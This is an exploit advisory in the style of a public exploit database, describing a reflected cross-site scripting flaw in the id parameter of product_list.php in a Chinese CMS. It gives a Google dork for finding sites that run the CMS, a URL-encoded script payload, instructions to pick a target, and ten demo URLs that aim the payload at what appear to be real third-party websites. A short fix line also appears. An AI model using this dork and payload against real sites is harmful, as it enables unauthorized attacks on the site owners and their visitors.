######################
# Exploit Title : 云脉网络 CMS Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://yt-c.net/
# Google Dork : intext:" 技术支持:云脉网络"
# Date: 21 May 2016
# Tested On : Kali
# Contact:n3t.hacker@gmail.com
######################
# Vulnerable File : product_list.php
# Request Method: GET
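# Payload : product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# Vulnerable Parameter : id (URL-decoded value: -1'"()&%<acx><ScRiPt >prompt(928808)</ScRiPt>). The prompt dialog appearing indicates that id is echoed into the response without HTML encoding.
# Fix : validate id server-side (it appears to be a numeric identifier) and HTML-encode it wherever it is written into the page.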
# Description : Search the dork and select a target. Put the payload after the URL, such as :
# http://site.com/product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
#
# ... Ok
#
# Demo :
# http://www.ytjieqiang.com//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.ytyuyang.com.cn//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.weiyupcb.com//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.dongfangwgysy.com//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.yt-taida.com//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.senyue.cn/en//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://rongchao.cn//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.yhgjmy.cn//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.yanco.cn//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.guotaihouse.com//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
#
#
######################
# Discovered by : Net Hacker
######################